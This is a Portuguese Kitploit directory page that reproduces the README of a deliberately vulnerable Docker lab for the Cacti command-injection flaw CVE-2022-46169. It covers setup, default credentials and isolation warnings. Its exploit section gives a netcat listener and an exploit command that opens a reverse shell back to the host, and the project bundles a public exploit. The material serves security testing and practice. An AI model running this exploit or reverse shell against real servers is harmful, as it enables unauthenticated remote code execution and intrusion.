Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cacti-rce-cve-2022-46169-vulnerable-application — AVISO: Esta é uma aplicação vulnerável para testar o exploit da injeção de comandos no Cacti (CVE-2022-46169). Execute por sua conta e risco! | Kitploit
Ferramentas/GitHubGitHub/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleLabs e Prática
GitHubm3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

cacti-rce-cve-2022-46169-vulnerable-application

AVISO: Esta é uma aplicação vulnerável para testar o exploit da injeção de comandos no Cacti (CVE-2022-46169). Execute por sua conta e risco!

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
12há 3 anosAinda não revisado

Cacti v1.2.22 injeção de comando (CVE-2022-46169) aplicação vulnerável

Esta é uma aplicação vulnerável para testar o exploit da vulnerabilidade Cacti (CVE-2022-46169).

AVISO!

Esta aplicação contém sérias vulnerabilidades de segurança. Execute por sua conta e risco! Recomenda-se usar um ambiente isolado e com backup (como uma VM com snapshot recente e rede somente host). Não faça upload desta aplicação para servidores na Internet, pois eles serão comprometidos.

DISCLAIMER: Não me responsabilizo pela forma como qualquer pessoa utiliza esta aplicação. O único propósito desta aplicação é ser um cenário de teste para o exploit CVE-2022-46169 e não deve ser usado maliciosamente. Se o seu servidor for comprometido através de uma instalação desta aplicação, a responsabilidade não é minha, e sim da(s) pessoa(s) que fizeram o upload e instalaram.

Informações sobre a vulnerabilidade

  • CVE-ID: CVE-2022-46169
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • Descrição: Em versões afetadas, uma vulnerabilidade de injeção de comando permite que um usuário não autenticado execute código arbitrário em um servidor rodando Cacti, se uma fonte de dados específica foi selecionada para qualquer dispositivo monitorado.

Uso

Aqui estão os passos para configurar o ambiente:

  1. Execute docker compose up -d para iniciar a composição.
  2. Você pode finalizar os passos navegando para http://127.0.0.1/cacti para iniciar o assistente de inicialização do Cacti. Se ocorrer um erro referente ao banco de dados, aguarde um pouco e recarregue a página.
  3. As credenciais padrão são admin/admin.
  4. Pressione "Próximo" em todos os botões durante o assistente, escolhendo opções conforme necessário. Todos os padrões devem estar corretos e todos os pré-requisitos obrigatórios devem ser atendidos.
  5. Após a instalação, você precisa configurar um novo gráfico:
    1. Clique em "Criar gráficos".
    2. Em "Modelos de Gráfico", no menu suspenso próximo a "Criar", selecione: "Device - Uptime".
    3. Pressione o botão "Criar".

O contêiner será chamado vuln-cacti.

Para desmontar o ambiente, use o comando docker compose down.

O guia oficial de instalação do Cacti pode ser encontrado aqui.

Causa raiz

Uma descrição detalhada da causa raiz da vulnerabilidade está disponível aqui.

Exploit

Um exploit público está disponível no Exploit-DB. Ele foi copiado para a pasta exploit/ por simplicidade.

Para executá-lo:

  1. Use netcat na máquina host para ouvir conexões de entrada.
    root@kitploit:~
    nc -lvp 6669
    
  2. Execute o exploit.
    root@kitploit:~
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    
    Dica: host.docker.internal é usado para alcançar a máquina host a partir do contêiner (referência).

Há também uma entrada no repositório vulhub.

Autores

  • Antonio Francesco Sardella - implementação - m3ssap0

Licença

Este projeto está licenciado sob a Unlicense - veja o arquivo LICENSE para detalhes.

Agradecimentos

  • Stefan Schiller, o pesquisador de segurança que descobriu a vulnerabilidade.
  • Riadh Bouchahoua, o desenvolvedor do exploit.
Baixar ferramenta